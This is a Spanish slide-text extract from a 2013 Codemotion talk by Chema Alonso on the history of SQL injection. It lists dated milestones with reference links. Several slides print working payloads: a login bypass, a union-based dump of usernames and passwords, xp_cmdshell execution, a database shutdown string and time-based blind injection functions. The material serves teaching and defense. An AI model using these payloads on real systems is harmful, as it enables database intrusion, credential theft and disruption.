Charla de Chema Alonso sobre la historia y evolución de las técnicas de SQL Injection en el evento Codemotion ES del año 2013 que tuvo lugar en la Escuela Universitaria de Informática de la Universidad Politécnica de Madrid
3. 25 – Dec – 1998: El nacimiento
http://www.phrack.org/issues.html?id=8&issue=54
4. „or „1‟=„1
admin
„ or „1‟=„1
q=“Select uid from users where uid=„“+$user+”‟ and pass=“‟+pass+‟”;”
q=“Select uid from users where uid=„admin‟ and pass=„‟ or „1‟=„1‟;”
5.
6. 14 – Aug – 2007: IBM
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
10. Yesterday - [Microsoft][ODBC SQL Server Driver]
[SQL Server]Incorrect syntax near the keyword 'or'.
q=“Select title from noticias where ud=“+$id+”;”
Id=1 or 1=(select top 1 username from sysusers)
13. Advanced Tricks
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07‟
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
exec master..xp_cmdshell 'dir'
Id= 1; shutdown --
22. 2004 – Time-Based in Other Databases
SQL Server
1) ; if … wait for delay
2) ; exec xp_cmdshell (ping –n)
Oracle
1) dms_lock.sleep()
PL/SLQ Injection
MySQL
1) and sleep()
5.0 or higher
2) Benchmarck functions
Postgres:
1) pg:sleep()
23. Jun – 2007 : Solar Empire Exploit
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
25. 2007 – Time-Based SQL Injection using Heavy Queries
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf